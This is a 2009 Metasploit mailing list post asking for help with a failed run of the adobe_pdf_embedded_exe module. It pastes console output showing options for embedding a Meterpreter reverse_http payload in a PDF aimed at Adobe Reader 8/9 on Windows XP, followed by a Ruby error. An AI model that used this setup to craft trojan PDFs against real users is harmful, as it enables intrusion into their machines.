Metasploit mailing list archives

adobe_pdf_embedded_exe


From: aczire at gmail.com (Aczire)
Date: Wed, 30 Sep 2009 22:35:40 +0530

Any ideas? Thanks ahead..

 

 

msf exploit(adobe_pdf_embedded_exe) > show options

 

Module options:

 

   Name        Current Setting  Required  Description

   ----        ---------------  --------  -----------

   EXENAME     out.exe          no        The Name of payload exe.

   FILENAME    c:\out.pdf       no        The output filename.

   INFILENAME  c:\msf.pdf       no        The Input PDF filename.

   OUTPUTPATH  c:\blue\         no        The location to output the file.

 

 

Payload options (windows/meterpreter/reverse_http):

 

   Name       Current Setting                       Required  Description

   ----       ---------------                       --------  -----------

   EXITFUNC   thread                                yes       Exit
technique: seh, thread, process

   PXAXCLSID  B3AC7307-FEAE-4e43-B2D6-161E68ABA838  yes       ActiveX CLSID

   PXAXVER    -1,-1,-1,-1                           yes       ActiveX DLL
Version

   PXHOST     localhost                             yes       The local HTTP
listener hostname

   PXPORT     80                                    yes       The local HTTP
listener port

   PXURI      /eHZnaV7UeheWLSNbZ3nFwi9GoL1sb7nf     no        The URI root
for requests

 

 

Exploit target:

 

   Id  Name

   --  ----

   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)

 

 

msf exploit(adobe_pdf_embedded_exe) > exploit

[*] PassiveX listener started.

[*] Reading in 'c:\msf.pdf'...

[*] Parseing 'c:\msf.pdf'...

[-] Exploit failed: undefined method `+' for nil:NilClass

[*] PassiveX listener stopped.

[*] Exploit completed, but no session was created.

 

 

 

Best Regards,

Aczire.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090930/d53194fb/attachment-0001.html>


Current thread: